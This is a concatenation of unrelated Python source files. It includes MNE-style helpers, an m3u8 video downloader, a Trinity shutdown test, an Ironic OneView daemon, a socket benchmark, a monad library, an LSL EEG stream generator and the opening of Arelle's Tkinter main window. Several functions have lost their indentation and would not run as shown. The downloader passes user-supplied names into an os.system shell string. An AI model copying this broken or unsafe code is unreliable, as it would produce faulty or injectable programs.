        logger.error('Command not found: %s' % command_name)
        raise
    try:
        yield p
    finally:
        # Always finish with the requested method, then reap the process so
        # no zombie is left behind
        getattr(p, after)()
        p.wait()
def _clean_names(names, remove_whitespace=False, before_dash=True):
"""Remove white-space on topo matching.
This function handles different naming
conventions for old VS new VectorView systems (`remove_whitespace`).
Also it allows to remove system specific parts in CTF channel names
(`before_dash`).
Usage
-----
# for new VectorView (only inside layout)
ch_names = _clean_names(epochs.ch_names, remove_whitespace=True)
# for CTF
ch_names = _clean_names(epochs.ch_names, before_dash=True)
"""
cleaned = []
for name in names:
if ' ' in name and remove_whitespace:
name = name.replace(' ', '')
if '-' in name and before_dash:
name = name.split('-')[0]
if name.endswith('_v'):
name = name[:-2]
cleaned.append(name)
return cleaned
def _get_argvalues():
    """Return all arguments (except self) and values of read_raw_xxx.

    Returns None when the expected caller is not an mne/io module, i.e. when
    invoked from an unexpected call-stack depth.
    """
    # call stack
    # read_raw_xxx -> <decorator-gen-000> -> BaseRaw.__init__ -> _get_argvalues
    # This is equivalent to `frame = inspect.stack(0)[4][0]` but faster
    frame = inspect.currentframe()
    try:
        # Walk three frames up to reach the read_raw_xxx caller
        for _ in range(3):
            frame = frame.f_back
        fname = frame.f_code.co_filename
        if not fnmatch.fnmatch(fname, '*/mne/io/*'):
            return None
        args, _, _, values = inspect.getargvalues(frame)
    finally:
        # Explicitly drop the frame reference to break the reference cycle
        # frames create with their locals
        del frame
    params = dict()
    for arg in args:
        params[arg] = values[arg]
    params.pop('self', None)
    return params
def sizeof_fmt(num):
    """Turn number of bytes into human-readable str.

    Parameters
    ----------
    num : int
        The number of bytes.

    Returns
    -------
    size : str
        The size in human-readable format.
    """
    units = ['bytes', 'kB', 'MB', 'GB', 'TB', 'PB']
    decimals = [0, 0, 1, 2, 2, 2]
    if num == 0:
        return '0 bytes'
    if num == 1:
        return '1 byte'
    if num > 1:
        exponent = min(int(log(num, 1024)), len(units) - 1)
        value = float(num) / 1024 ** exponent
        return '{0:.{1}f} {2}'.format(value, decimals[exponent], units[exponent])
def _file_like(obj):
# An alternative would be::
#
# isinstance(obj, (TextIOBase, BufferedIOBase, RawIOBase, IOBase))
#
# but this might be more robust to file-like objects not properly
# inheriting from these classes:
return all(callable(getattr(obj, name, None)) for name in ('read', 'seek'))
def _assert_no_instances(cls, when=''):
    """Assert that no live (referenced) instances of *cls* exist.

    Used as a leak check in tests: collects garbage, then scans all tracked
    objects for instances of *cls* that still have non-trivial referrers.
    """
    __tracebackhide__ = True  # hide this helper frame in pytest tracebacks
    n = 0
    ref = list()
    gc.collect()
    objs = gc.get_objects()
    for obj in objs:
        try:
            check = isinstance(obj, cls)
        except Exception:  # such as a weakref
            check = False
        if check:
            rr = gc.get_referrers(obj)
            count = 0
            # Ignore referrers that are bookkeeping artifacts of this very
            # function: the objs list, our namespaces, and stack frames
            for r in rr:
                if r is not objs and \
                        r is not globals() and \
                        r is not locals() and \
                        not inspect.isframe(r):
                    ref.append(
                        f'{r.__class__.__name__}: ' +
                        repr(r)[:100].replace('\n', ' '))
                    count += 1
                del r
            del rr
            n += count > 0
    assert n == 0, f'{n} {when}:\n' + '\n'.join(ref)
|
download_m3u8.py | #!/usr/bin/env python
# -*- coding:utf-8 -*
# ############################################################
#
# Copyright (c) 2020 xxx.com, Inc. All Rights Reserved
#
# ############################################################
'''
@Date: 2020-03-15 16:14:35
@Author: tf
@LastEditTime: 2020-03-19 00:08:18
@LastEditors: tianfeng04
@Description:
'''
import argparse
import datetime
import hashlib
import re
import requests
import shutil
import threading
import os
from queue import Queue
class Downloadm3u8(object):
    """
    Download an HLS (m3u8) video: fetch the playlist, download all .ts
    segments (and the AES key, if any) with a pool of threads into a cache
    directory, then merge the segments with ffmpeg and remove the cache.
    """
    def __init__(self, thread_num):
        """
        Initialize the downloader.

        Arguments:
            thread_num {int} -- number of download threads to spawn
        """
        self.__thread_num = thread_num
        # Scratch directory for segments/keys; removed after a successful merge
        self.__tmp_dir = './cache'
    def __down_m3u8_file(self, m3u8_url):
        """
        Download the m3u8 playlist and rewrite it for local playback.

        Arguments:
            m3u8_url {str} -- URL of the remote playlist

        Returns:
            (Queue, str) -- queue of [segment_url, local_name] pairs and the
            path of the rewritten local playlist
        """
        resp = requests.get(m3u8_url)
        m3u8_text = resp.text
        ts_queue = Queue(10000)
        lines = m3u8_text.split('\n')
        base_download_url = os.path.dirname(m3u8_url)
        local_m3u8_path = os.path.join(self.__tmp_dir, "local.m3u8")
        index = 0
        contents = []
        key_url = None
        for line in lines:
            # Remember the encryption key URI when present
            if re.search('URI=', line):
                p1 = re.compile(r'URI=["](.*?)["]', re.S)
                key_url = re.findall(p1, line)[0]
            # Directives/short lines are copied verbatim into the local playlist
            if re.match('^#', line) or len(line) < 10:
                contents.append(line + os.linesep)
                continue
            index += 1
            file_url = os.path.join(base_download_url, line)
            file_name = str(index).zfill(6) + ".ts"
            ts_queue.put([file_url, file_name])
            contents.append(file_name + os.linesep)
        # if key_url exist, download
        key_name = ''
        if key_url:
            ret = requests.get(key_url)
            key_name = hashlib.md5(key_url.encode()).hexdigest() + ".key"
            key_path = os.path.join(self.__tmp_dir, key_name)
            with open(key_path, 'wb') as f:
                f.write(ret.content)
                f.close()
        # if key_url exist, update key_url by local_url
        for index, line in enumerate(contents):
            if re.search('URI=', line):
                p1 = re.compile(r'URI=["](.*?)["]', re.S)
                key_url = re.findall(p1, line)[0]
                line = line.replace(key_url, key_name)
                contents[index] = line
        # update m3u8
        with open(local_m3u8_path, 'w') as f:
            for line in contents:
                f.write(line)
            f.close()
        return ts_queue, local_m3u8_path
    def __thread_download_ts(self, ts_queue):
        """Worker: pop [url, name] pairs off the queue and download each
        segment into the cache directory until the queue is empty."""
        tt_name = threading.current_thread().getName()
        while not ts_queue.empty():
            ts_obj = ts_queue.get()
            ts_url = ts_obj[0]
            filename = ts_obj[1]
            r = requests.get(ts_url, stream=True)
            ts_local_path = os.path.join(self.__tmp_dir, filename)
            # NOTE(review): the segment is fetched *before* this existence
            # check, so an already-cached file still costs a network request
            if os.path.exists(ts_local_path):
                continue
            with open(ts_local_path, 'wb') as fp:
                for chunk in r.iter_content(5242):
                    if chunk:
                        fp.write(chunk)
            print("[{}]: src: {} --> dst: {} succeed.".format(tt_name, ts_url, ts_local_path))
    def __merge_ts_by_ffmepg(self, local_m3u8_path, video_name):
        """
        Merge the cached *.ts segments into *video_name* via ffmpeg.

        Arguments:
            local_m3u8_path {str} -- path of the rewritten local playlist
            video_name {str} -- output video file name
        """
        # NOTE(review): the bare except hides any failure, and os.system's
        # exit code is ignored, so 'merge succeed.' can print on failure
        try:
            command = 'ffmpeg -allowed_extensions ALL -i {} -c copy -y {}'.format(local_m3u8_path, video_name)
            print(command)
            os.system(command)
            print('merge succeed.')
        except:
            print('merge failed.')
    def run(self, m3u8_url, video_name):
        """
        Download and assemble the whole video.

        Arguments:
            m3u8_url {str} -- URL of the remote playlist
            video_name {str} -- output video file name (e.g. 0001.mp4)
        """
        if not os.path.exists(self.__tmp_dir):
            os.makedirs(self.__tmp_dir)
        s, local_m3u8_path = self.__down_m3u8_file(m3u8_url=m3u8_url)
        start_time = datetime.datetime.now().replace(microsecond=0)
        threads = []
        for i in range(self.__thread_num):
            t = threading.Thread(target=self.__thread_download_ts, name='th-'+str(i), kwargs={'ts_queue': s})
            threads.append(t)
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        end_time = datetime.datetime.now().replace(microsecond=0)
        print('dowonload consuming: {}'.format(end_time - start_time))
        start_time = datetime.datetime.now().replace(microsecond=0)
        self.__merge_ts_by_ffmepg(local_m3u8_path=local_m3u8_path, video_name=video_name)
        end_time = datetime.datetime.now().replace(microsecond=0)
        print("merge consuming: {}".format(end_time - start_time))
        shutil.rmtree(self.__tmp_dir)
if __name__ == '__main__':
    # Command-line entry point: parse arguments and run the downloader.
    parser = argparse.ArgumentParser()
    parser.add_argument('--version', action='version',
                        version='%(prog)s version : v0.0.1', help='show the version')
    parser.add_argument("--m3u8_url", "-m", type=str, help='download m3u8 url')
    parser.add_argument("--video_name", "-v", type=str, help="vido name like 0001.mp4")
    parser.add_argument("--num_thread", "-n", type=int, default=8, help="thread nums")
    args = parser.parse_args()
    m3u8_url = args.m3u8_url
    video_name = args.video_name
    thread_num = args.num_thread
    # Fixed: the original only rejected *negative* values, so ``-n 0`` would
    # spawn no download threads at all and the download would silently stall.
    if thread_num <= 0:
        thread_num = 16
    Downloadm3u8(thread_num=thread_num).run(m3u8_url=m3u8_url, video_name=video_name)
|
test_service_and_endpoint_shutdown_utils.py | import asyncio
import multiprocessing
import os
import signal
import pytest
from p2p.service import BaseService
from trinity.endpoint import TrinityEventBusEndpoint
from trinity._utils.shutdown import (
exit_with_endpoint_and_services,
)
class SimpleService(BaseService):
    """Minimal BaseService that signals readiness, then idles until cancelled."""
    def __init__(self, ready_to_kill_event, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # multiprocessing.Event used to tell the parent process we are running
        self.ready_to_kill_event = ready_to_kill_event
    async def _run(self):
        # Signal the test process that it is now safe to send the kill signal
        self.ready_to_kill_event.set()
        # Block until the service is cancelled from outside
        await self.cancellation()
def run_service(ready_to_kill_event):
    """Child-process target: run a SimpleService plus endpoint until shutdown.

    After the loop exits, asserts that the shutdown helper both cancelled the
    service and stopped the endpoint.
    """
    loop = asyncio.get_event_loop()
    endpoint = TrinityEventBusEndpoint("dummy")
    service = SimpleService(ready_to_kill_event, loop=loop)
    # NOTE(review): exit_with_endpoint_and_services presumably installs the
    # signal handling that eventually stops the loop — see trinity._utils.shutdown
    asyncio.ensure_future(exit_with_endpoint_and_services(endpoint, service))
    asyncio.ensure_future(service.run())
    loop.run_forever()
    loop.close()
    assert service.is_cancelled
    assert endpoint._running is False
@pytest.mark.parametrize('sig', (signal.SIGINT, signal.SIGTERM))
@pytest.mark.asyncio
async def test_exit_with_endpoind_and_services_facilitates_clean_shutdown(sig):
    """Spawn a child running the service, signal it, and expect a clean,
    prompt (<= 1s) shutdown for both SIGINT and SIGTERM."""
    ready_to_kill_event = multiprocessing.Event()
    proc = multiprocessing.Process(target=run_service, args=(ready_to_kill_event,))
    proc.start()
    # Wait until the child's service is actually running before signalling it
    ready_to_kill_event.wait()
    os.kill(proc.pid, sig)
    proc.join(timeout=1)
|
manage.py | # Copyright 2017 Hewlett Packard Enterprise Development LP
# Copyright 2017 Universidade Federal de Campina Grande
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from multiprocessing import Process
from oslo_log import log as logging
from ironic_oneviewd.facade import Facade
from ironic_oneviewd.inventory_manager.manage import InventoryManager
from ironic_oneviewd.node_manager.manage import NodeManager
LOG = logging.getLogger(__name__)
def do_oneview_daemon():
    """Ironic OneView Daemon.

    Runs the node manager and the inventory manager in two child processes,
    sharing one Facade instance, and blocks until both exit.
    """
    LOG.info('Starting Ironic OneView Daemon')
    facade = Facade()
    node_manager = NodeManager(facade)
    inventory_manager = InventoryManager(facade)
    def execute():
        # One process per manager; the join() calls keep the daemon alive
        # until both managers stop
        process1 = Process(target=node_manager.run)
        process1.start()
        process2 = Process(target=inventory_manager.run)
        process2.start()
        process1.join()
        process2.join()
    execute()
|
pref_rps.py | from threading import Thread
import socket
import time
# Requests-per-second micro-benchmark against a local echo-style server.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('localhost', 1234))
# Disable Nagle's algorithm so each 1-byte request is sent immediately
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# Shared request counter and run flag for the monitor thread
n = 0
status = True
def monitor():
    """Print and reset the per-second request count until *status* goes False."""
    global n, status
    while status:
        time.sleep(1)
        print(n, 'reqs/sec')
        n = 0
Thread(target=monitor).start()
# Tight request/response loop; the bare except means any socket error
# (or Ctrl-C) ends the benchmark and stops the monitor thread below
while True:
    try:
        sock.send(b'1')
        resp = sock.recv(100)
        n += 1
    except:
        break
status = False
sock.close()
|
monadic.py | # Shamelessly copy/pasted from this awesome article :
# https://www.toptal.com/javascript/option-maybe-either-future-monads-js*
# by Alexey Karasev
import threading
from functools import reduce
class Monad:
    """Minimal monad interface: subclasses supply ``pure`` and ``flat_map``."""

    # pure :: a -> M a. Same as unit: a -> M a
    @staticmethod
    def pure(x):
        raise Exception("pure method needs to be implemented")

    # flat_map :: M a -> (a -> M b) -> M b
    def flat_map(self, f):
        raise Exception("flat_map method needs to be implemented")

    # map :: M a -> (a -> b) -> M b
    def map(self, f):
        # Derived from flat_map by lifting the plain result back with pure
        return self.flat_map(lambda inner: self.pure(f(inner)))


class Option(Monad):
    """Optional value: either Some(x) or the empty singleton ``nil``."""

    # pure :: a -> Option a
    @staticmethod
    def pure(x):
        return Some(x)

    # flat_map :: Option a -> (a -> Option b) -> Option b
    def flat_map(self, f):
        return f(self.value) if self.defined else nil


class Some(Option):
    """Present Option carrying a value."""

    def __init__(self, value):
        self.defined = True
        self.value = value


class Nil(Option):
    """Absent Option; chaining short-circuits to ``nil``."""

    def __init__(self):
        self.defined = False
        self.value = None


nil = Nil()


class Either(Monad):
    """Success (Right) or failure (Left); Left short-circuits chaining."""

    # pure :: a -> Either a
    @staticmethod
    def pure(value):
        return Right(value)

    # flat_map :: Either a -> (a -> Either b) -> Either b
    def flat_map(self, f):
        return self if self.is_left else f(self.value)


class Left(Either):
    """Failure branch carrying an error value."""

    def __init__(self, value):
        self.is_left = True
        self.value = value


class Right(Either):
    """Success branch carrying a result value."""

    def __init__(self, value):
        self.is_left = False
        self.value = value
class Future(Monad):
    """Asynchronous computation that eventually holds an Either err a.

    Subscribers registered before completion are each invoked on their own
    thread when ``callback`` fires; later subscribers receive the cached
    value synchronously.
    """
    # __init__ :: ((Either err a -> void) -> void) -> Future (Either err a)
    def __init__(self, f):
        self.subscribers = []
        self.cache = nil
        # Binary semaphore guarding cache/subscribers against concurrent access
        self.semaphore = threading.BoundedSemaphore(1)
        f(self.callback)
    # pure :: a -> Future a
    @staticmethod
    def pure(value):
        return Future(lambda cb: cb(Either.pure(value)))
    # NOTE(review): exec/exec_on_thread/asyn/traverse take no ``self`` and are
    # not marked @staticmethod; they only work when accessed via the class
    # (e.g. Future.exec), which is how this module calls them.
    def exec(f, cb):
        try:
            data = f()
            cb(Right(data))
        except Exception as err:
            cb(Left(err))
    def exec_on_thread(f, cb):
        t = threading.Thread(target=Future.exec, args=[f, cb])
        t.start()
    def asyn(f):
        # Wrap a plain callable into a Future resolved on a worker thread
        return Future(lambda cb: Future.exec_on_thread(f, cb))
    # flat_map :: (a -> Future b) -> Future b
    def flat_map(self, f):
        # Left results propagate unchanged; Right results feed f and chain
        return Future(
            lambda cb: self.subscribe(
                lambda value: cb(value)
                if (value.is_left)
                else f(value.value).subscribe(cb)
            )
        )
    # traverse :: [a] -> (a -> Future b) -> Future [b]
    def traverse(arr):
        return lambda f: reduce(
            lambda acc, elem: acc.flat_map(
                lambda values: f(elem).map(lambda value: values + [value])
            ),
            arr,
            Future.pure([]),
        )
    # callback :: Either err a -> void
    def callback(self, value):
        self.semaphore.acquire()
        self.cache = Some(value)
        # Fire each queued subscriber on its own thread
        while len(self.subscribers) > 0:
            sub = self.subscribers.pop(0)
            t = threading.Thread(target=sub, args=[value])
            t.start()
        self.semaphore.release()
    # subscribe :: (Either err a -> void) -> void
    def subscribe(self, subscriber):
        self.semaphore.acquire()
        if self.cache.defined:
            # Already resolved: release the lock first, then call synchronously
            self.semaphore.release()
            subscriber(self.cache.value)
        else:
            self.subscribers.append(subscriber)
            self.semaphore.release()
|
samplegeneration.py | from threading import current_thread, Thread
import numpy as np
import random, sys, os
import string, time
from .xdf import load_xdf
from pylsl import local_clock, StreamInfo, StreamOutlet
RANDOM_CHN = 16
class SampleGeneration:
    """Push EEG samples to LSL outlets from a background thread.

    Mode "random" generates synthetic data on freshly created outlets;
    presumably any other mode replays the bundled XDF session file —
    confirm with callers before relying on that.
    """

    def __init__(self, mode):
        # mode: "random" creates outlets now; other modes defer to
        # _outlet()'s else branch (not invoked here).
        self.mode = mode
        self.thread = None    # sender thread, None while stopped
        self.running = False  # loop flag read by _update()
        # initialize
        self.outlets = []
        self.sample_rate = None
        self.num_streams = None
        if mode == "random":
            self.sample_rate = 60.0
            self.num_streams = 2
            self._outlet()

    def start(self):
        """Start the background sender; returns False if already running."""
        if self.thread:
            return False
        self.thread = Thread(target=self._update, daemon=True, name="SendingData")
        self.running = True
        self.thread.start()
        return True

    def stop(self):
        """Stop the sender thread; joins it unless called from within it."""
        if not self.thread:
            return True
        self.running = False
        if current_thread() is not self.thread:
            self.thread.join()
        self.thread = None
        return True

    def _outlet(self):
        """Create the LSL StreamOutlets for this generator's streams."""
        if self.mode == "random":
            colors = ['Purple', 'Orange', 'Green', 'Blue', 'Black', 'White']
            for num in range(self.num_streams):
                letters = string.digits
                # 4-digit random suffix keeps stream uids distinct per run
                id = ''.join(random.choice(letters) for i in range(4))
                uid = str(colors[num]) + '-' + id
                info = StreamInfo('EEG-{}'.format(uid), 'EEG', RANDOM_CHN, self.sample_rate, 'float32', uid)
                self.outlets.append(StreamOutlet(info))
        else:
            # Mirror the EEG streams found in the bundled XDF recording.
            # filepath = self.resource_path('support/session_2020_02_21_14_21_11_anticipation.xdf') # TODO
            filepath = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'session_2020_02_21_14_21_11_anticipation.xdf')
            raw_file = load_xdf(filepath, synchronize_clocks=False, dejitter_timestamps=False, verbose=False)[0]
            raw_file = [f for f in raw_file if 'EEG' in f['info']['name'][0]]
            # defining output streams
            for i, person in enumerate(raw_file):
                id = person['info']['source_id']
                info = StreamInfo(person['info']['name'][0], person['info']['type'][0],
                                  int(person['info']['channel_count'][0]),
                                  int(person['info']['nominal_srate'][0]), person['info']['channel_format'][0], id[0])
                self.outlets.append(StreamOutlet(info))

    def _update(self):
        """Sender loop: push samples until self.running is cleared."""
        while self.running:
            if self.mode == 'random':
                # One random sample per outlet, all sharing a timestamp.
                ts = local_clock()
                for outlet in self.outlets:
                    sample = list(np.random.rand(RANDOM_CHN))
                    outlet.push_sample(sample, timestamp=ts)
                time.sleep(1.0 / self.sample_rate)
            else:
                # NOTE(review): the XDF file is re-read on every pass of the
                # while loop, replaying the whole session repeatedly.
                # filepath = self.resource_path('support/session_2020_02_21_14_21_11_anticipation.xdf') # TODO
                filepath = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                                        'session_2020_02_21_14_21_11_anticipation.xdf')
                raw_file = load_xdf(filepath, synchronize_clocks=False, dejitter_timestamps=False, verbose=False)[0]
                raw_file = [f for f in raw_file if 'EEG' in f['info']['name'][0]]
                # defining output streams
                data = []
                for i, person in enumerate(raw_file):
                    id = person['info']['source_id']
                    raw = person['time_series'].T
                    data.append(raw)
                print("now sending data...")
                # truncate to the shortest stream so column indices stay valid
                length = min([d.shape[1] for d in data])
                for i in range(length):
                    ts = local_clock()
                    for subject, outlet in enumerate(self.outlets):
                        outlet.push_sample(data[subject][:, i], timestamp=ts)
                    time.sleep(0.004)

    def resource_path(self, relative_path):
        """Resolve a bundled resource path (PyInstaller _MEIPASS aware)."""
        if hasattr(sys, '_MEIPASS'):
            return os.path.join(sys._MEIPASS, relative_path)
        return os.path.join(os.path.abspath("."), relative_path)
CntlrWinMain.py | '''
Created on Oct 3, 2010
This module is Arelle's controller in windowing interactive UI mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle import PythonUtil # define 2.x or 3.x string types
import os, sys, subprocess, pickle, time, locale, re
from tkinter import (Tk, TclError, Toplevel, Menu, PhotoImage, StringVar, BooleanVar, N, S, E, W, EW,
HORIZONTAL, VERTICAL, END)
try:
from tkinter.ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
except ImportError: # 3.0 versions of tkinter
from ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
import tkinter.tix
import tkinter.filedialog
import tkinter.messagebox, traceback
from arelle.Locale import format_string
from arelle.CntlrWinTooltip import ToolTip
from arelle import XbrlConst
from arelle.PluginManager import pluginClassMethods
from arelle.UrlUtil import isHttpUrl
import logging
import threading, queue
from arelle import Cntlr
from arelle import (DialogURL, DialogLanguage,
DialogPluginManager, DialogPackageManager,
ModelDocument,
ModelManager,
RenderingEvaluator,
ViewWinDTS,
ViewWinProperties, ViewWinConcepts, ViewWinRelationshipSet, ViewWinFormulae,
ViewWinFactList, ViewWinFactTable, ViewWinRenderedGrid, ViewWinXml,
ViewWinRoleTypes, ViewFileRoleTypes, ViewFileConcepts,
ViewWinTests, ViewWinTree, ViewWinVersReport, ViewWinRssFeed,
ViewFileTests,
ViewFileRenderedGrid,
ViewFileRelationshipSet,
Updater
)
from arelle.ModelFormulaObject import FormulaOptions
from arelle.FileSource import openFileSource
restartMain = True
class CntlrWinMain (Cntlr.Cntlr):
    def __init__(self, parent):
        """Build the main window: menus, toolbar, paned views, message log,
        and restore geometry/preferences from the saved configuration.

        parent: the Tk root window.
        """
        super(CntlrWinMain, self).__init__(hasGui=True)
        self.parent = parent
        self.filename = None
        self.dirty = False
        overrideLang = self.config.get("labelLangOverride")
        self.labelLang = overrideLang if overrideLang else self.modelManager.defaultLang
        self.data = {}

        # Route tkinter callback exceptions through TkinterCallWrapper
        # (defined elsewhere in this module).
        tkinter.CallWrapper = TkinterCallWrapper

        # --- window icon (platform-specific) ---
        imgpath = self.imagesDir + os.sep
        if self.isMSW:
            icon = imgpath + "arelle.ico"
            parent.iconbitmap(icon, default=icon)
            #image = PhotoImage(file=path + "arelle32.gif")
            #label = Label(None, image=image)
            #parent.iconwindow(label)
        else:
            parent.iconbitmap("@" + imgpath + "arelle.xbm")
            # try with gif file
            #parent.iconbitmap(path + "arelle.gif")

        # --- file menu; "PLUG-IN" rows are extension points for plug-ins ---
        self.menubar = Menu(self.parent)
        self.parent["menu"] = self.menubar
        self.fileMenu = Menu(self.menubar, tearoff=0)
        self.fileMenuLength = 1
        for label, command, shortcut_text, shortcut in (
                #(_("New..."), self.fileNew, "Ctrl+N", "<Control-n>"),
                (_("Open File..."), self.fileOpen, "Ctrl+O", "<Control-o>"),
                (_("Open Web..."), self.webOpen, "Shift+Alt+O", "<Shift-Alt-o>"),
                (_("Import File..."), self.importFileOpen, None, None),
                (_("Import Web..."), self.importWebOpen, None, None),
                ("PLUG-IN", "CntlrWinMain.Menu.File.Open", None, None),
                (_("Save..."), self.fileSave, "Ctrl+S", "<Control-s>"),
                (_("Save DTS Package"), self.saveDTSpackage, None, None),
                ("PLUG-IN", "CntlrWinMain.Menu.File.Save", None, None),
                (_("Close"), self.fileClose, "Ctrl+W", "<Control-w>"),
                (None, None, None, None),
                (_("Quit"), self.quit, "Ctrl+Q", "<Control-q>"),
                #(_("Restart"), self.restart, None, None),
                (None, None, None, None),
                ("",None,None,None) # position for file history
                ):
            if label is None:
                self.fileMenu.add_separator()
            elif label == "PLUG-IN":
                for pluginMenuExtender in pluginClassMethods(command):
                    pluginMenuExtender(self, self.fileMenu)
            else:
                self.fileMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
                self.parent.bind(shortcut, command)
                # count entries so loadFileMenuHistory knows where history goes
                self.fileMenuLength += 1
        self.loadFileMenuHistory()
        self.menubar.add_cascade(label=_("File"), menu=self.fileMenu, underline=0)

        # --- tools menu: validation options (each backed by a BooleanVar
        #     synchronized with the saved config and the model manager) ---
        toolsMenu = Menu(self.menubar, tearoff=0)
        validateMenu = Menu(self.menubar, tearoff=0)
        toolsMenu.add_cascade(label=_("Validation"), menu=validateMenu, underline=0)
        validateMenu.add_command(label=_("Validate"), underline=0, command=self.validate)
        self.modelManager.validateDisclosureSystem = self.config.setdefault("validateDisclosureSystem",False)
        self.validateDisclosureSystem = BooleanVar(value=self.modelManager.validateDisclosureSystem)
        self.validateDisclosureSystem.trace("w", self.setValidateDisclosureSystem)
        validateMenu.add_checkbutton(label=_("Disclosure system checks"), underline=0, variable=self.validateDisclosureSystem, onvalue=True, offvalue=False)
        validateMenu.add_command(label=_("Select disclosure system..."), underline=0, command=self.selectDisclosureSystem)
        self.modelManager.validateCalcLB = self.config.setdefault("validateCalcLB",False)
        self.validateCalcLB = BooleanVar(value=self.modelManager.validateCalcLB)
        self.validateCalcLB.trace("w", self.setValidateCalcLB)
        validateMenu.add_checkbutton(label=_("Calc Linkbase checks"), underline=0, variable=self.validateCalcLB, onvalue=True, offvalue=False)
        self.modelManager.validateInferDecimals = self.config.setdefault("validateInferDecimals",False)
        self.validateInferDecimals = BooleanVar(value=self.modelManager.validateInferDecimals)
        self.validateInferDecimals.trace("w", self.setValidateInferDecimals)
        validateMenu.add_checkbutton(label=_("Infer Decimals in calculations"), underline=0, variable=self.validateInferDecimals, onvalue=True, offvalue=False)
        self.modelManager.validateUtr = self.config.setdefault("validateUtr",True)
        self.validateUtr = BooleanVar(value=self.modelManager.validateUtr)
        self.validateUtr.trace("w", self.setValidateUtr)
        validateMenu.add_checkbutton(label=_("Unit Type Registry validation"), underline=0, variable=self.validateUtr, onvalue=True, offvalue=False)
        for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Validation"):
            pluginMenuExtender(self, validateMenu)

        # --- formula, compare, RSS watch ---
        formulaMenu = Menu(self.menubar, tearoff=0)
        formulaMenu.add_command(label=_("Parameters..."), underline=0, command=self.formulaParametersDialog)
        toolsMenu.add_cascade(label=_("Formula"), menu=formulaMenu, underline=0)
        self.modelManager.formulaOptions = FormulaOptions(self.config.get("formulaParameters"))
        toolsMenu.add_command(label=_("Compare DTSes..."), underline=0, command=self.compareDTSes)
        cacheMenu = Menu(self.menubar, tearoff=0)
        rssWatchMenu = Menu(self.menubar, tearoff=0)
        rssWatchMenu.add_command(label=_("Options..."), underline=0, command=self.rssWatchOptionsDialog)
        rssWatchMenu.add_command(label=_("Start"), underline=0, command=lambda: self.rssWatchControl(start=True))
        rssWatchMenu.add_command(label=_("Stop"), underline=0, command=lambda: self.rssWatchControl(stop=True))
        toolsMenu.add_cascade(label=_("RSS Watch"), menu=rssWatchMenu, underline=0)
        self.modelManager.rssWatchOptions = self.config.setdefault("rssWatchOptions", {})

        # --- internet/cache menu ---
        toolsMenu.add_cascade(label=_("Internet"), menu=cacheMenu, underline=0)
        self.webCache.workOffline = self.config.setdefault("workOffline",False)
        self.workOffline = BooleanVar(value=self.webCache.workOffline)
        self.workOffline.trace("w", self.setWorkOffline)
        cacheMenu.add_checkbutton(label=_("Work offline"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
        cacheMenu.add_command(label=_("Clear cache"), underline=0, command=self.confirmClearWebCache)
        cacheMenu.add_command(label=_("Manage cache"), underline=0, command=self.manageWebCache)
        cacheMenu.add_command(label=_("Proxy Server"), underline=0, command=self.setupProxy)

        # --- messages-log menu ---
        logmsgMenu = Menu(self.menubar, tearoff=0)
        toolsMenu.add_cascade(label=_("Messages log"), menu=logmsgMenu, underline=0)
        logmsgMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
        logmsgMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
        self.modelManager.collectProfileStats = self.config.setdefault("collectProfileStats",False)
        self.collectProfileStats = BooleanVar(value=self.modelManager.collectProfileStats)
        self.collectProfileStats.trace("w", self.setCollectProfileStats)
        logmsgMenu.add_checkbutton(label=_("Collect profile stats"), underline=0, variable=self.collectProfileStats, onvalue=True, offvalue=False)
        logmsgMenu.add_command(label=_("Log profile stats"), underline=0, command=self.showProfileStats)
        logmsgMenu.add_command(label=_("Clear profile stats"), underline=0, command=self.clearProfileStats)
        toolsMenu.add_command(label=_("Language..."), underline=0, command=lambda: DialogLanguage.askLanguage(self))
        for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Tools"):
            pluginMenuExtender(self, toolsMenu)
        self.menubar.add_cascade(label=_("Tools"), menu=toolsMenu, underline=0)

        # --- help menu ---
        helpMenu = Menu(self.menubar, tearoff=0)
        for label, command, shortcut_text, shortcut in (
                (_("Check for updates"), lambda: Updater.checkForUpdates(self), None, None),
                (_("Manage plug-ins"), lambda: DialogPluginManager.dialogPluginManager(self), None, None),
                (_("Manage packages"), lambda: DialogPackageManager.dialogPackageManager(self), None, None),
                ("PLUG-IN", "CntlrWinMain.Menu.Help.Upper", None, None),
                (None, None, None, None),
                (_("About..."), self.helpAbout, None, None),
                ("PLUG-IN", "CntlrWinMain.Menu.Help.Lower", None, None),
                ):
            if label is None:
                helpMenu.add_separator()
            elif label == "PLUG-IN":
                for pluginMenuExtender in pluginClassMethods(command):
                    pluginMenuExtender(self, helpMenu)
            else:
                helpMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
                self.parent.bind(shortcut, command)
        for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Help"):
            pluginMenuExtender(self, toolsMenu)
        self.menubar.add_cascade(label=_("Help"), menu=helpMenu, underline=0)

        # --- main frame: statusbar and toolbar ---
        windowFrame = Frame(self.parent)
        self.statusbar = Label(windowFrame, text=_("Ready..."), anchor=W)
        self.statusbarTimerId = self.statusbar.after(5000, self.uiClearStatusTimerEvent)
        self.statusbar.grid(row=2, column=0, columnspan=2, sticky=EW)
        #self.balloon = tkinter.tix.Balloon(windowFrame, statusbar=self.statusbar)
        self.toolbar_images = []
        toolbar = Frame(windowFrame)
        menubarColumn = 0
